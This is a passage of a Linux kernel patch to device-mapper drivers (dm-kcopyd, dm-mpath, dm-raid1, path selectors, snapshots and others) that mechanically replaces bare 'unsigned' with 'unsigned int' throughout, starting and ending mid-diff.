+ 	for (i = 0; i < nr_pages; i++) {
+@@ -341,7 +341,7 @@ static void client_free_pages(struct dm_kcopyd_client *kc)
+ struct kcopyd_job {
+ 	struct dm_kcopyd_client *kc;
+ 	struct list_head list;
+-	unsigned flags;
++	unsigned int flags;
+ 
+ 	/*
+ 	 * Error state of the job.
+@@ -582,7 +582,7 @@ static int run_io_job(struct kcopyd_job *job)
+ static int run_pages_job(struct kcopyd_job *job)
+ {
+ 	int r;
+-	unsigned nr_pages = dm_div_up(job->dests[0].count, PAGE_SIZE >> 9);
++	unsigned int nr_pages = dm_div_up(job->dests[0].count, PAGE_SIZE >> 9);
+ 
+ 	r = kcopyd_get_pages(job->kc, nr_pages, &job->pages);
+ 	if (!r) {
+@@ -849,8 +849,8 @@ void dm_kcopyd_copy(struct dm_kcopyd_client *kc, struct dm_io_region *from,
+ EXPORT_SYMBOL(dm_kcopyd_copy);
+ 
+ void dm_kcopyd_zero(struct dm_kcopyd_client *kc,
+-		    unsigned num_dests, struct dm_io_region *dests,
+-		    unsigned flags, dm_kcopyd_notify_fn fn, void *context)
++		    unsigned int num_dests, struct dm_io_region *dests,
++		    unsigned int flags, dm_kcopyd_notify_fn fn, void *context)
+ {
+ 	dm_kcopyd_copy(kc, NULL, num_dests, dests, flags, fn, context);
+ }
+@@ -906,7 +906,7 @@ int kcopyd_cancel(struct kcopyd_job *job, int block)
+ struct dm_kcopyd_client *dm_kcopyd_client_create(struct dm_kcopyd_throttle *throttle)
+ {
+ 	int r;
+-	unsigned reserve_pages;
++	unsigned int reserve_pages;
+ 	struct dm_kcopyd_client *kc;
+ 
+ 	kc = kzalloc(sizeof(*kc), GFP_KERNEL);
+diff --git a/drivers/md/dm-linear.c b/drivers/md/dm-linear.c
+index 3212ef6aa81bb..26b1af6461771 100644
+--- a/drivers/md/dm-linear.c
++++ b/drivers/md/dm-linear.c
+@@ -95,7 +95,7 @@ static int linear_map(struct dm_target *ti, struct bio *bio)
+ }
+ 
+ static void linear_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct linear_c *lc = (struct linear_c *) ti->private;
+ 	size_t sz = 0;
+diff --git a/drivers/md/dm-log-userspace-base.c b/drivers/md/dm-log-userspace-base.c
+index 9ab93ebea8895..9fc69382692bd 100644
+--- a/drivers/md/dm-log-userspace-base.c
++++ b/drivers/md/dm-log-userspace-base.c
+@@ -123,7 +123,7 @@ retry:
+ }
+ 
+ static int build_constructor_string(struct dm_target *ti,
+-				    unsigned argc, char **argv,
++				    unsigned int argc, char **argv,
+ 				    char **ctr_str)
+ {
+ 	int i, str_size;
+@@ -188,7 +188,7 @@ static void do_flush(struct work_struct *work)
+  * to the userspace ctr function.
+  */
+ static int userspace_ctr(struct dm_dirty_log *log, struct dm_target *ti,
+-			 unsigned argc, char **argv)
++			 unsigned int argc, char **argv)
+ {
+ 	int r = 0;
+ 	int str_size;
+@@ -792,7 +792,7 @@ static region_t userspace_get_sync_count(struct dm_dirty_log *log)
+  * Returns: amount of space consumed
+  */
+ static int userspace_status(struct dm_dirty_log *log, status_type_t status_type,
+-			    char *result, unsigned maxlen)
++			    char *result, unsigned int maxlen)
+ {
+ 	int r = 0;
+ 	char *table_args;
+diff --git a/drivers/md/dm-log-userspace-transfer.c b/drivers/md/dm-log-userspace-transfer.c
+index fdf8ec304f8d2..072559b709edd 100644
+--- a/drivers/md/dm-log-userspace-transfer.c
++++ b/drivers/md/dm-log-userspace-transfer.c
+@@ -142,7 +142,7 @@ static void cn_ulog_callback(struct cn_msg *msg, struct netlink_skb_parms *nsp)
+ 		fill_pkg(msg, NULL);
+ 	else if (msg->len < sizeof(*tfr))
+ 		DMERR("Incomplete message received (expected %u, got %u): [%u]",
+-		      (unsigned)sizeof(*tfr), msg->len, msg->seq);
++		      (unsigned int)sizeof(*tfr), msg->len, msg->seq);
+ 	else
+ 		fill_pkg(NULL, tfr);
+ 	spin_unlock(&receiving_list_lock);
+diff --git a/drivers/md/dm-log-writes.c b/drivers/md/dm-log-writes.c
+index 178e13a5b059f..efdfb2e1868a4 100644
+--- a/drivers/md/dm-log-writes.c
++++ b/drivers/md/dm-log-writes.c
+@@ -792,10 +792,10 @@ static int normal_end_io(struct dm_target *ti, struct bio *bio,
+  * INFO format: <logged entries> <highest allocated sector>
+  */
+ static void log_writes_status(struct dm_target *ti, status_type_t type,
+-			      unsigned status_flags, char *result,
+-			      unsigned maxlen)
++			      unsigned int status_flags, char *result,
++			      unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct log_writes_c *lc = ti->private;
+ 
+ 	switch (type) {
+@@ -844,8 +844,8 @@ static int log_writes_iterate_devices(struct dm_target *ti,
+  * Messages supported:
+  *   mark <mark data> - specify the marked data.
+  */
+-static int log_writes_message(struct dm_target *ti, unsigned argc, char **argv,
+-			      char *result, unsigned maxlen)
++static int log_writes_message(struct dm_target *ti, unsigned int argc, char **argv,
++			      char *result, unsigned int maxlen)
+ {
+ 	int r = -EINVAL;
+ 	struct log_writes_c *lc = ti->private;
+diff --git a/drivers/md/dm-log.c b/drivers/md/dm-log.c
+index cf10fa6677972..159f2c05dfd3c 100644
+--- a/drivers/md/dm-log.c
++++ b/drivers/md/dm-log.c
+@@ -223,7 +223,7 @@ struct log_c {
+ 	unsigned int region_count;
+ 	region_t sync_count;
+ 
+-	unsigned bitset_uint32_count;
++	unsigned int bitset_uint32_count;
+ 	uint32_t *clean_bits;
+ 	uint32_t *sync_bits;
+ 	uint32_t *recovering_bits;	/* FIXME: this seems excessive */
+@@ -255,20 +255,20 @@ struct log_c {
+  * The touched member needs to be updated every time we access
+  * one of the bitsets.
+  */
+-static inline int log_test_bit(uint32_t *bs, unsigned bit)
++static inline int log_test_bit(uint32_t *bs, unsigned int bit)
+ {
+ 	return test_bit_le(bit, bs) ? 1 : 0;
+ }
+ 
+ static inline void log_set_bit(struct log_c *l,
+-			       uint32_t *bs, unsigned bit)
++			       uint32_t *bs, unsigned int bit)
+ {
+ 	__set_bit_le(bit, bs);
+ 	l->touched_cleaned = 1;
+ }
+ 
+ static inline void log_clear_bit(struct log_c *l,
+-				 uint32_t *bs, unsigned bit)
++				 uint32_t *bs, unsigned int bit)
+ {
+ 	__clear_bit_le(bit, bs);
+ 	l->touched_dirtied = 1;
+@@ -582,7 +582,7 @@ static void fail_log_device(struct log_c *lc)
+ static int disk_resume(struct dm_dirty_log *log)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct log_c *lc = (struct log_c *) log->context;
+ 	size_t size = lc->bitset_uint32_count * sizeof(uint32_t);
+ 
+diff --git a/drivers/md/dm-mpath.c b/drivers/md/dm-mpath.c
+index 0e325469a252a..91c25ad8eed84 100644
+--- a/drivers/md/dm-mpath.c
++++ b/drivers/md/dm-mpath.c
+@@ -29,7 +29,7 @@
+ 
+ #define DM_MSG_PREFIX "multipath"
+ #define DM_PG_INIT_DELAY_MSECS 2000
+-#define DM_PG_INIT_DELAY_DEFAULT ((unsigned) -1)
++#define DM_PG_INIT_DELAY_DEFAULT ((unsigned int) -1)
+ #define QUEUE_IF_NO_PATH_TIMEOUT_DEFAULT 0
+ 
+ static unsigned long queue_if_no_path_timeout_secs = QUEUE_IF_NO_PATH_TIMEOUT_DEFAULT;
+@@ -39,7 +39,7 @@ struct pgpath {
+ 	struct list_head list;
+ 
+ 	struct priority_group *pg;	/* Owning PG */
+-	unsigned fail_count;		/* Cumulative failure count */
++	unsigned int fail_count;		/* Cumulative failure count */
+ 
+ 	struct dm_path path;
+ 	struct delayed_work activate_path;
+@@ -59,8 +59,8 @@ struct priority_group {
+ 	struct multipath *m;		/* Owning multipath instance */
+ 	struct path_selector ps;
+ 
+-	unsigned pg_num;		/* Reference number */
+-	unsigned nr_pgpaths;		/* Number of paths in PG */
++	unsigned int pg_num;		/* Reference number */
++	unsigned int nr_pgpaths;		/* Number of paths in PG */
+ 	struct list_head pgpaths;
+ 
+ 	bool bypassed:1;		/* Temporarily bypass this PG? */
+@@ -78,14 +78,14 @@ struct multipath {
+ 	struct priority_group *next_pg;	/* Switch to this PG if set */
+ 
+ 	atomic_t nr_valid_paths;	/* Total number of usable paths */
+-	unsigned nr_priority_groups;
++	unsigned int nr_priority_groups;
+ 	struct list_head priority_groups;
+ 
+ 	const char *hw_handler_name;
+ 	char *hw_handler_params;
+ 	wait_queue_head_t pg_init_wait;	/* Wait for pg_init completion */
+-	unsigned pg_init_retries;	/* Number of times to retry pg_init */
+-	unsigned pg_init_delay_msecs;	/* Number of msecs before pg_init retry */
++	unsigned int pg_init_retries;	/* Number of times to retry pg_init */
++	unsigned int pg_init_delay_msecs;	/* Number of msecs before pg_init retry */
+ 	atomic_t pg_init_in_progress;	/* Only one pg_init allowed at once */
+ 	atomic_t pg_init_count;		/* Number of times pg_init called */
+ 
+@@ -397,7 +397,7 @@ static struct pgpath *choose_pgpath(struct multipath *m, size_t nr_bytes)
+ 	unsigned long flags;
+ 	struct priority_group *pg;
+ 	struct pgpath *pgpath;
+-	unsigned bypassed = 1;
++	unsigned int bypassed = 1;
+ 
+ 	if (!atomic_read(&m->nr_valid_paths)) {
+ 		spin_lock_irqsave(&m->lock, flags);
+@@ -840,7 +840,7 @@ static int parse_path_selector(struct dm_arg_set *as, struct priority_group *pg,
+ {
+ 	int r;
+ 	struct path_selector_type *pst;
+-	unsigned ps_argc;
++	unsigned int ps_argc;
+ 
+ 	static const struct dm_arg _args[] = {
+ 		{0, 1024, "invalid number of path selector args"},
+@@ -983,7 +983,7 @@ static struct priority_group *parse_priority_group(struct dm_arg_set *as,
+ 	};
+ 
+ 	int r;
+-	unsigned i, nr_selector_args, nr_args;
++	unsigned int i, nr_selector_args, nr_args;
+ 	struct priority_group *pg;
+ 	struct dm_target *ti = m->ti;
+ 
+@@ -1049,7 +1049,7 @@ static struct priority_group *parse_priority_group(struct dm_arg_set *as,
+ 
+ static int parse_hw_handler(struct dm_arg_set *as, struct multipath *m)
+ {
+-	unsigned hw_argc;
++	unsigned int hw_argc;
+ 	int ret;
+ 	struct dm_target *ti = m->ti;
+ 
+@@ -1101,7 +1101,7 @@ fail:
+ static int parse_features(struct dm_arg_set *as, struct multipath *m)
+ {
+ 	int r;
+-	unsigned argc;
++	unsigned int argc;
+ 	struct dm_target *ti = m->ti;
+ 	const char *arg_name;
+ 
+@@ -1170,7 +1170,7 @@ static int parse_features(struct dm_arg_set *as, struct multipath *m)
+ 	return r;
+ }
+ 
+-static int multipath_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int multipath_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	/* target arguments */
+ 	static const struct dm_arg _args[] = {
+@@ -1181,8 +1181,8 @@ static int multipath_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 	int r;
+ 	struct multipath *m;
+ 	struct dm_arg_set as;
+-	unsigned pg_count = 0;
+-	unsigned next_pg_num;
++	unsigned int pg_count = 0;
++	unsigned int next_pg_num;
+ 	unsigned long flags;
+ 
+ 	as.argc = argc;
+@@ -1224,7 +1224,7 @@ static int multipath_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 	/* parse the priority groups */
+ 	while (as.argc) {
+ 		struct priority_group *pg;
+-		unsigned nr_valid_paths = atomic_read(&m->nr_valid_paths);
++		unsigned int nr_valid_paths = atomic_read(&m->nr_valid_paths);
+ 
+ 		pg = parse_priority_group(&as, m);
+ 		if (IS_ERR(pg)) {
+@@ -1365,7 +1365,7 @@ static int reinstate_path(struct pgpath *pgpath)
+ 	int r = 0, run_queue = 0;
+ 	unsigned long flags;
+ 	struct multipath *m = pgpath->pg->m;
+-	unsigned nr_valid_paths;
++	unsigned int nr_valid_paths;
+ 
+ 	spin_lock_irqsave(&m->lock, flags);
+ 
+@@ -1454,7 +1454,7 @@ static void bypass_pg(struct multipath *m, struct priority_group *pg,
+ static int switch_pg_num(struct multipath *m, const char *pgstr)
+ {
+ 	struct priority_group *pg;
+-	unsigned pgnum;
++	unsigned int pgnum;
+ 	unsigned long flags;
+ 	char dummy;
+ 
+@@ -1487,7 +1487,7 @@ static int switch_pg_num(struct multipath *m, const char *pgstr)
+ static int bypass_pg_num(struct multipath *m, const char *pgstr, bool bypassed)
+ {
+ 	struct priority_group *pg;
+-	unsigned pgnum;
++	unsigned int pgnum;
+ 	char dummy;
+ 
+ 	if (!pgstr || (sscanf(pgstr, "%u%c", &pgnum, &dummy) != 1) || !pgnum ||
+@@ -1789,14 +1789,14 @@ static void multipath_resume(struct dm_target *ti)
+  *      num_paths num_selector_args [path_dev [selector_args]* ]+ ]+
+  */
+ static void multipath_status(struct dm_target *ti, status_type_t type,
+-			     unsigned status_flags, char *result, unsigned maxlen)
++			     unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	int sz = 0, pg_counter, pgpath_counter;
+ 	unsigned long flags;
+ 	struct multipath *m = ti->private;
+ 	struct priority_group *pg;
+ 	struct pgpath *p;
+-	unsigned pg_num;
++	unsigned int pg_num;
+ 	char state;
+ 
+ 	spin_lock_irqsave(&m->lock, flags);
+@@ -1948,8 +1948,8 @@ static void multipath_status(struct dm_target *ti, status_type_t type,
+ 	spin_unlock_irqrestore(&m->lock, flags);
+ }
+ 
+-static int multipath_message(struct dm_target *ti, unsigned argc, char **argv,
+-			     char *result, unsigned maxlen)
++static int multipath_message(struct dm_target *ti, unsigned int argc, char **argv,
++			     char *result, unsigned int maxlen)
+ {
+ 	int r = -EINVAL;
+ 	struct dm_dev *dev;
+diff --git a/drivers/md/dm-mpath.h b/drivers/md/dm-mpath.h
+index e230f71962596..5343698fe5f1b 100644
+--- a/drivers/md/dm-mpath.h
++++ b/drivers/md/dm-mpath.h
+@@ -17,6 +17,6 @@ struct dm_path {
+ };
+ 
+ /* Callback for hwh_pg_init_fn to use when complete */
+-void dm_pg_init_complete(struct dm_path *path, unsigned err_flags);
++void dm_pg_init_complete(struct dm_path *path, unsigned int err_flags);
+ 
+ #endif
+diff --git a/drivers/md/dm-path-selector.h b/drivers/md/dm-path-selector.h
+index 83cac2b04b668..0f2b37af87662 100644
+--- a/drivers/md/dm-path-selector.h
++++ b/drivers/md/dm-path-selector.h
+@@ -52,7 +52,7 @@ struct path_selector_type {
+ 	/*
+ 	 * Constructs a path selector object, takes custom arguments
+ 	 */
+-	int (*create) (struct path_selector *ps, unsigned argc, char **argv);
++	int (*create) (struct path_selector *ps, unsigned int argc, char **argv);
+ 	void (*destroy) (struct path_selector *ps);
+ 
+ 	/*
+diff --git a/drivers/md/dm-ps-io-affinity.c b/drivers/md/dm-ps-io-affinity.c
+index f74501e65a8ed..76ce4ce872229 100644
+--- a/drivers/md/dm-ps-io-affinity.c
++++ b/drivers/md/dm-ps-io-affinity.c
+@@ -108,7 +108,7 @@ free_pi:
+ 	return ret;
+ }
+ 
+-static int ioa_create(struct path_selector *ps, unsigned argc, char **argv)
++static int ioa_create(struct path_selector *ps, unsigned int argc, char **argv)
+ {
+ 	struct selector *s;
+ 
+@@ -138,7 +138,7 @@ free_selector:
+ static void ioa_destroy(struct path_selector *ps)
+ {
+ 	struct selector *s = ps->context;
+-	unsigned cpu;
++	unsigned int cpu;
+ 
+ 	for_each_cpu(cpu, s->path_mask)
+ 		ioa_free_path(s, cpu);
+diff --git a/drivers/md/dm-ps-queue-length.c b/drivers/md/dm-ps-queue-length.c
+index cef70657bbbc2..6fbec9fc242d9 100644
+--- a/drivers/md/dm-ps-queue-length.c
++++ b/drivers/md/dm-ps-queue-length.c
+@@ -35,7 +35,7 @@ struct selector {
+ struct path_info {
+ 	struct list_head	list;
+ 	struct dm_path		*path;
+-	unsigned		repeat_count;
++	unsigned int		repeat_count;
+ 	atomic_t		qlen;	/* the number of in-flight I/Os */
+ };
+ 
+@@ -52,7 +52,7 @@ static struct selector *alloc_selector(void)
+ 	return s;
+ }
+ 
+-static int ql_create(struct path_selector *ps, unsigned argc, char **argv)
++static int ql_create(struct path_selector *ps, unsigned int argc, char **argv)
+ {
+ 	struct selector *s = alloc_selector();
+ 
+@@ -84,9 +84,9 @@ static void ql_destroy(struct path_selector *ps)
+ }
+ 
+ static int ql_status(struct path_selector *ps, struct dm_path *path,
+-		     status_type_t type, char *result, unsigned maxlen)
++		     status_type_t type, char *result, unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct path_info *pi;
+ 
+ 	/* When called with NULL path, return selector status/args. */
+@@ -116,7 +116,7 @@ static int ql_add_path(struct path_selector *ps, struct dm_path *path,
+ {
+ 	struct selector *s = ps->context;
+ 	struct path_info *pi;
+-	unsigned repeat_count = QL_MIN_IO;
++	unsigned int repeat_count = QL_MIN_IO;
+ 	char dummy;
+ 	unsigned long flags;
+ 
+diff --git a/drivers/md/dm-ps-round-robin.c b/drivers/md/dm-ps-round-robin.c
+index 27f44c5fa04e8..1d07392b5ed48 100644
+--- a/drivers/md/dm-ps-round-robin.c
++++ b/drivers/md/dm-ps-round-robin.c
+@@ -26,7 +26,7 @@
+ struct path_info {
+ 	struct list_head list;
+ 	struct dm_path *path;
+-	unsigned repeat_count;
++	unsigned int repeat_count;
+ };
+ 
+ static void free_paths(struct list_head *paths)
+@@ -62,7 +62,7 @@ static struct selector *alloc_selector(void)
+ 	return s;
+ }
+ 
+-static int rr_create(struct path_selector *ps, unsigned argc, char **argv)
++static int rr_create(struct path_selector *ps, unsigned int argc, char **argv)
+ {
+ 	struct selector *s;
+ 
+@@ -119,7 +119,7 @@ static int rr_add_path(struct path_selector *ps, struct dm_path *path,
+ {
+ 	struct selector *s = ps->context;
+ 	struct path_info *pi;
+-	unsigned repeat_count = RR_MIN_IO;
++	unsigned int repeat_count = RR_MIN_IO;
+ 	char dummy;
+ 	unsigned long flags;
+ 
+diff --git a/drivers/md/dm-ps-service-time.c b/drivers/md/dm-ps-service-time.c
+index 3ec9c33265c52..84d26234dc053 100644
+--- a/drivers/md/dm-ps-service-time.c
++++ b/drivers/md/dm-ps-service-time.c
+@@ -30,8 +30,8 @@ struct selector {
+ struct path_info {
+ 	struct list_head list;
+ 	struct dm_path *path;
+-	unsigned repeat_count;
+-	unsigned relative_throughput;
++	unsigned int repeat_count;
++	unsigned int relative_throughput;
+ 	atomic_t in_flight_size;	/* Total size of in-flight I/Os */
+ };
+ 
+@@ -48,7 +48,7 @@ static struct selector *alloc_selector(void)
+ 	return s;
+ }
+ 
+-static int st_create(struct path_selector *ps, unsigned argc, char **argv)
++static int st_create(struct path_selector *ps, unsigned int argc, char **argv)
+ {
+ 	struct selector *s = alloc_selector();
+ 
+@@ -80,9 +80,9 @@ static void st_destroy(struct path_selector *ps)
+ }
+ 
+ static int st_status(struct path_selector *ps, struct dm_path *path,
+-		     status_type_t type, char *result, unsigned maxlen)
++		     status_type_t type, char *result, unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct path_info *pi;
+ 
+ 	if (!path)
+@@ -113,8 +113,8 @@ static int st_add_path(struct path_selector *ps, struct dm_path *path,
+ {
+ 	struct selector *s = ps->context;
+ 	struct path_info *pi;
+-	unsigned repeat_count = ST_MIN_IO;
+-	unsigned relative_throughput = 1;
++	unsigned int repeat_count = ST_MIN_IO;
++	unsigned int relative_throughput = 1;
+ 	char dummy;
+ 	unsigned long flags;
+ 
+diff --git a/drivers/md/dm-raid.c b/drivers/md/dm-raid.c
+index 54263679a7b14..b26c12856b1db 100644
+--- a/drivers/md/dm-raid.c
++++ b/drivers/md/dm-raid.c
+@@ -3712,7 +3712,7 @@ static void raid_status(struct dm_target *ti, status_type_t type,
+ }
+ 
+ static int raid_message(struct dm_target *ti, unsigned int argc, char **argv,
+-			char *result, unsigned maxlen)
++			char *result, unsigned int maxlen)
+ {
+ 	struct raid_set *rs = ti->private;
+ 	struct mddev *mddev = &rs->md;
+diff --git a/drivers/md/dm-raid1.c b/drivers/md/dm-raid1.c
+index 06a38dc320253..8bd7e87d3538e 100644
+--- a/drivers/md/dm-raid1.c
++++ b/drivers/md/dm-raid1.c
+@@ -82,7 +82,7 @@ struct mirror_set {
+ 
+ 	struct work_struct trigger_event;
+ 
+-	unsigned nr_mirrors;
++	unsigned int nr_mirrors;
+ 	struct mirror mirror[];
+ };
+ 
+@@ -327,7 +327,7 @@ static void recovery_complete(int read_err, unsigned long write_err,
+ 
+ static void recover(struct mirror_set *ms, struct dm_region *reg)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_io_region from, to[DM_KCOPYD_MAX_REGIONS], *dest;
+ 	struct mirror *m;
+ 	unsigned long flags = 0;
+@@ -593,7 +593,7 @@ static void do_reads(struct mirror_set *ms, struct bio_list *reads)
+ 
+ static void write_callback(unsigned long error, void *context)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	struct bio *bio = (struct bio *) context;
+ 	struct mirror_set *ms;
+ 	int should_wake = 0;
+@@ -963,10 +963,10 @@ static int get_mirror(struct mirror_set *ms, struct dm_target *ti,
+  * Create dirty log: log_type #log_params <log_params>
+  */
+ static struct dm_dirty_log *create_dirty_log(struct dm_target *ti,
+-					     unsigned argc, char **argv,
+-					     unsigned *args_used)
++					     unsigned int argc, char **argv,
++					     unsigned int *args_used)
+ {
+-	unsigned param_count;
++	unsigned int param_count;
+ 	struct dm_dirty_log *dl;
+ 	char dummy;
+ 
+@@ -997,10 +997,10 @@ static struct dm_dirty_log *create_dirty_log(struct dm_target *ti,
+ 	return dl;
+ }
+ 
+-static int parse_features(struct mirror_set *ms, unsigned argc, char **argv,
+-			  unsigned *args_used)
++static int parse_features(struct mirror_set *ms, unsigned int argc, char **argv,
++			  unsigned int *args_used)
+ {
+-	unsigned num_features;
++	unsigned int num_features;
+ 	struct dm_target *ti = ms->ti;
+ 	char dummy;
+ 	int i;
+@@ -1389,7 +1389,7 @@ static char device_status_char(struct mirror *m)
+ 
+ 
+ static void mirror_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	unsigned int m, sz = 0;
+ 	int num_feature_args = 0;
+@@ -1458,7 +1458,7 @@ static int mirror_iterate_devices(struct dm_target *ti,
+ {
+ 	struct mirror_set *ms = ti->private;
+ 	int ret = 0;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; !ret && i < ms->nr_mirrors; i++)
+ 		ret = fn(ti, ms->mirror[i].dev,
+diff --git a/drivers/md/dm-region-hash.c b/drivers/md/dm-region-hash.c
+index 1f760451e6f48..adbdb4b671372 100644
+--- a/drivers/md/dm-region-hash.c
++++ b/drivers/md/dm-region-hash.c
+@@ -56,17 +56,17 @@
+  *---------------------------------------------------------------*/
+ struct dm_region_hash {
+ 	uint32_t region_size;
+-	unsigned region_shift;
++	unsigned int region_shift;
+ 
+ 	/* holds persistent region state */
+ 	struct dm_dirty_log *log;
+ 
+ 	/* hash table */
+ 	rwlock_t hash_lock;
+-	unsigned mask;
+-	unsigned nr_buckets;
+-	unsigned prime;
+-	unsigned shift;
++	unsigned int mask;
++	unsigned int nr_buckets;
++	unsigned int prime;
++	unsigned int shift;
+ 	struct list_head *buckets;
+ 
+ 	/*
+@@ -74,7 +74,7 @@ struct dm_region_hash {
+ 	 */
+ 	int flush_failure;
+ 
+-	unsigned max_recovery; /* Max # of regions to recover in parallel */
++	unsigned int max_recovery; /* Max # of regions to recover in parallel */
+ 
+ 	spinlock_t region_lock;
+ 	atomic_t recovery_in_flight;
+@@ -163,12 +163,12 @@ struct dm_region_hash *dm_region_hash_create(
+ 						     struct bio_list *bios),
+ 		void (*wakeup_workers)(void *context),
+ 		void (*wakeup_all_recovery_waiters)(void *context),
+-		sector_t target_begin, unsigned max_recovery,
++		sector_t target_begin, unsigned int max_recovery,
+ 		struct dm_dirty_log *log, uint32_t region_size,
+ 		region_t nr_regions)
+ {
+ 	struct dm_region_hash *rh;
+-	unsigned nr_buckets, max_buckets;
++	unsigned int nr_buckets, max_buckets;
+ 	size_t i;
+ 	int ret;
+ 
+@@ -236,7 +236,7 @@ EXPORT_SYMBOL_GPL(dm_region_hash_create);
+ 
+ void dm_region_hash_destroy(struct dm_region_hash *rh)
+ {
+-	unsigned h;
++	unsigned int h;
+ 	struct dm_region *reg, *nreg;
+ 
+ 	BUG_ON(!list_empty(&rh->quiesced_regions));
+@@ -263,9 +263,9 @@ struct dm_dirty_log *dm_rh_dirty_log(struct dm_region_hash *rh)
+ }
+ EXPORT_SYMBOL_GPL(dm_rh_dirty_log);
+ 
+-static unsigned rh_hash(struct dm_region_hash *rh, region_t region)
++static unsigned int rh_hash(struct dm_region_hash *rh, region_t region)
+ {
+-	return (unsigned) ((region * rh->prime) >> rh->shift) & rh->mask;
++	return (unsigned int) ((region * rh->prime) >> rh->shift) & rh->mask;
+ }
+ 
+ static struct dm_region *__rh_lookup(struct dm_region_hash *rh, region_t region)
+diff --git a/drivers/md/dm-rq.c b/drivers/md/dm-rq.c
+index a41209a43506c..80f46e01bca44 100644
+--- a/drivers/md/dm-rq.c
++++ b/drivers/md/dm-rq.c
+@@ -23,33 +23,33 @@ struct dm_rq_target_io {
+ 	union map_info info;
+ 	struct dm_stats_aux stats_aux;
+ 	unsigned long duration_jiffies;
+-	unsigned n_sectors;
+-	unsigned completed;
++	unsigned int n_sectors;
++	unsigned int completed;
+ };
+ 
+ #define DM_MQ_NR_HW_QUEUES 1
+ #define DM_MQ_QUEUE_DEPTH 2048
+-static unsigned dm_mq_nr_hw_queues = DM_MQ_NR_HW_QUEUES;
+-static unsigned dm_mq_queue_depth = DM_MQ_QUEUE_DEPTH;
++static unsigned int dm_mq_nr_hw_queues = DM_MQ_NR_HW_QUEUES;
++static unsigned int dm_mq_queue_depth = DM_MQ_QUEUE_DEPTH;
+ 
+ /*
+  * Request-based DM's mempools' reserved IOs set by the user.
+  */
+ #define RESERVED_REQUEST_BASED_IOS	256
+-static unsigned reserved_rq_based_ios = RESERVED_REQUEST_BASED_IOS;
++static unsigned int reserved_rq_based_ios = RESERVED_REQUEST_BASED_IOS;
+ 
+-unsigned dm_get_reserved_rq_based_ios(void)
++unsigned int dm_get_reserved_rq_based_ios(void)
+ {
+ 	return __dm_get_module_param(&reserved_rq_based_ios,
+ 				     RESERVED_REQUEST_BASED_IOS, DM_RESERVED_MAX_IOS);
+ }
+ 
+-static unsigned dm_get_blk_mq_nr_hw_queues(void)
++static unsigned int dm_get_blk_mq_nr_hw_queues(void)
+ {
+ 	return __dm_get_module_param(&dm_mq_nr_hw_queues, 1, 32);
+ }
+ 
+-static unsigned dm_get_blk_mq_queue_depth(void)
++static unsigned int dm_get_blk_mq_queue_depth(void)
+ {
+ 	return __dm_get_module_param(&dm_mq_queue_depth,
+ 				     DM_MQ_QUEUE_DEPTH, BLK_MQ_MAX_DEPTH);
+diff --git a/drivers/md/dm-rq.h b/drivers/md/dm-rq.h
+index 1eea0da641db5..2c97ad1451400 100644
+--- a/drivers/md/dm-rq.h
++++ b/drivers/md/dm-rq.h
+@@ -38,7 +38,7 @@ void dm_stop_queue(struct request_queue *q);
+ 
+ void dm_mq_kick_requeue_list(struct mapped_device *md);
+ 
+-unsigned dm_get_reserved_rq_based_ios(void);
++unsigned int dm_get_reserved_rq_based_ios(void);
+ 
+ ssize_t dm_attr_rq_based_seq_io_merge_deadline_show(struct mapped_device *md, char *buf);
+ ssize_t dm_attr_rq_based_seq_io_merge_deadline_store(struct mapped_device *md,
+diff --git a/drivers/md/dm-snap-persistent.c b/drivers/md/dm-snap-persistent.c
+index 680cc05ec6542..5176810f5d243 100644
+--- a/drivers/md/dm-snap-persistent.c
++++ b/drivers/md/dm-snap-persistent.c
+@@ -303,7 +303,7 @@ static int read_header(struct pstore *ps, int *new_snapshot)
+ {
+ 	int r;
+ 	struct disk_header *dh;
+-	unsigned chunk_size;
++	unsigned int chunk_size;
+ 	int chunk_size_supplied = 1;
+ 	char *chunk_err;
+ 
+@@ -895,11 +895,11 @@ err_workqueue:
+ 	return r;
+ }
+ 
+-static unsigned persistent_status(struct dm_exception_store *store,
++static unsigned int persistent_status(struct dm_exception_store *store,
+ 				  status_type_t status, char *result,
+-				  unsigned maxlen)
++				  unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 
+ 	switch (status) {
+ 	case STATUSTYPE_INFO:
+diff --git a/drivers/md/dm-snap-transient.c b/drivers/md/dm-snap-transient.c
+index 0e0ae4c36b374..d83a0565bd101 100644
+--- a/drivers/md/dm-snap-transient.c
++++ b/drivers/md/dm-snap-transient.c
+@@ -84,11 +84,11 @@ static int transient_ctr(struct dm_exception_store *store, char *options)
+ 	return 0;
+ }
+ 
+-static unsigned transient_status(struct dm_exception_store *store,
++static unsigned int transient_status(struct dm_exception_store *store,
+ 				 status_type_t status, char *result,
+-				 unsigned maxlen)
++				 unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 
+ 	switch (status) {
+ 	case STATUSTYPE_INFO:
+diff --git a/drivers/md/dm-snap.c b/drivers/md/dm-snap.c
+index d1c2f84d27e36..c64d987c544d7 100644
+--- a/drivers/md/dm-snap.c
++++ b/drivers/md/dm-snap.c
+@@ -41,7 +41,7 @@ static const char dm_snapshot_merge_target_name[] = "snapshot-merge";
+ 
+ struct dm_exception_table {
+ 	uint32_t hash_mask;
+-	unsigned hash_shift;
++	unsigned int hash_shift;
+ 	struct hlist_bl_head *table;
+ };
+ 
+@@ -106,7 +106,7 @@ struct dm_snapshot {
+ 	/* The on disk metadata handler */
+ 	struct dm_exception_store *store;
+ 
